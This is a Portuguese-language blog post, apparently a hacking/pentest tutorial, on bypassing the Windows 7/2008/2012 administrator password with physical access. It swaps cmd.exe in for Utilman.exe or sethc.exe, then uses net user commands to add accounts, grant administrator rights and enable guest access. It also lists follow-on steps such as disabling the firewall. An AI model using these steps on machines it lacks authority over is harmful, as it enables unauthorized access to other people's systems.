– root@injetionsec:~#

Reset à senha de administrator – Windows 7/2008/2012

05.07.2015 (2:38 pm) – Filed under: Windows ::

Acesse á série de post que estou retratando : Privilégios de admin em Windows (NT/2000/XP/2003/7/2008/2012/8)

 

1ª – FORMA DE RESET DE PASSWORD

você terá que ter uma .ISO Linux que pode ser baixada em qualquer site oficial, após esta no sistema operacional vamos executar os seguintes comando.
root@ubuntu:# fdisk –l

0fefoff_1

Esse comando ira mostrar para nos as partições que temos no HD, para mais opções você pode :

root@ubuntu:# man fdisk –l
root@ubuntu:# mkdir /mnt /windowsmontado
root@ubuntu:# mount –t ntfs-3g /dev/sda1 /mnt/ windowsmontado

usamos no tipo de formato de arquivo o ntfs-3g isso ira montar a partições ntfs em modo leitura e escrita, caso não seja usado será montado só como modo de leitura

root@ubuntu:# cd /mnt/ windowsmontado
root@ubuntu: /mnt/ windowsmontado/Windows/System32 # mv Utilman.exe Utilman.bak
root@ubuntu: /mnt/ windowsmontado/Windows/System32 # mv cmd.exe Utilman.exe
root@ubuntu: /mnt/ windowsmontado/Windows/System32 # cd
root@ubuntu: # umount –l /dev/sda1

se aparecer essa tela e só dar ok

0fefoff_2

Logo em seguida clicar em

0fefoff_3

Você então vera o prompt de comando com o ultiman.exe, siga os passos.

0fefoff_4

Digite set e de ENTER , esse comando e onde estão definidas as variáveis de ambiente.

Vejamos os seis níveis de integridade no Windows 7 e Vista
1 . Installer (instalação do software)
2. System (sistema de processos)
3. High (administradores)
4. Medium (usuário)
5. Low (Internet Explorer quando é ativado o modo de proteção)
6. Untrusted (nível mais baixo)
Mesmo que o controle de conta de usuário esteja habilitado na máquina explorada, o segundo nível foi obtido com o prompt de comando aberto podemos então explorar, realizando alguns tarefas

— Adicionando um usuário
— Ativando e desativando usuários(alterar as senhas de usuários)
— adicionando usuários aos grupos de administradores
— Vendo os registros
–Startando e parando serviços
–Copiando, adicionar ou excluir arquivos e pastas, modificando data e hora
— Permitindo que os usuários se conectem remotamente
–Abrindo um determinado tipo de serviço ou porta
— Desabilitando firewall

A seguir vamos ver uma lista de comandos usados para manipular as contas de usuário no sistema a partir da linha de comando:

net user user1 pass /add : adiciona uma conta chamada user1 com a senha pass
net localgroup administrators user /add : adiciona o usuario user1 ao grupo administrators .
net user administrator /active:yes : ativa a conta de administrador que está desativada por padrão no Windows Vista/72008.
net user administrator pass : o usuário administrator terá a senha pass.
net user administrator /comment: “já era ” : Faz um comentário na conta
net user guest /active:yes : ativa a conta de convidado que esta desabilitada por padrão nos Windows com exceção do 95, 98,ME)
net guest pass2: muda a senha do usuario convidado para senha pass2
net localgroup administrators guest /add : adiciona o usuário convidado ao grupo dos administradores.

 

2ª – FORMA DE RESET DE PASSWORD

1 – DVD de instalação do Windows
2 – No processo de instalação, clique em “reparar seu computador”.
3 – Escolha o sistema operacional e clique em “Avançar”.
4 – Depois de um tempo será exibida uma tela, clique em prompt de comando(cmd). Isto irá abrir uma janela do cmd.
5 – execute os dois comandos abaixo em ordem no cmd
_________ren sethc.exe sethc_.exe
_________copy cmd.exe sethc.exe
6 – Agora reinicie seu computador. Depois de reiniciar Pressione a tecla Shift por cinco vezes rapidamente quando você vê a tela de logon.
7 – Com isso você vai ver  o cmd com privilégios de administrador.
8 – agora você pode alterar a senha usando o comando net user
_________net user [nome de usuário] [senha] /add
veja o exemplo:
_________net user joao 123 /add

 

3ª – FORMA DE RESET DE PASSWORD

1 clique em iniciar e digite  “sethc.exe” e execute como administrador.
2 clique em segurança de guia e clique na guia Avançado
3 Selecione seu usuário atual e clique em alterar premissions
4 Agora clique em Editar
5 Agora clique na caixa de seleção controle total e clique em OK
6 copiar o novo sethc.exe c:\windows\system32 Copie e substitua
7 reinicie o computador
8 tela login, clique 5 vezes no botao shift  e você vera o cmd como modo de administrador
_________net user [nome de usuário] [senha] /add
veja o exemplo:
_________net user joao *
 –
0/
 –
Mais referência:
 –

Privilégios de admin em Windows (NT/2000/XP/2003/7/2008/8)

05.07.2015 (2:18 pm) – Filed under: Hacking,Pentest,Windows ::

windowsss

Galera iniciarei uma série de post retratando como remover senhas para ter acesso a sistemas windows (NT/2000/XP/2003/7/2008/2012/8), visto que esse ataques você terá que ter acesso físico a máquina.

» Reset à senha de administrator – Windows 7/2008/2012
» Reset à senha de administrator – Windows XP
» Reset à senha de administrator – Windows 2003
» Reset à senha de administrator – Windows NT/2000

0/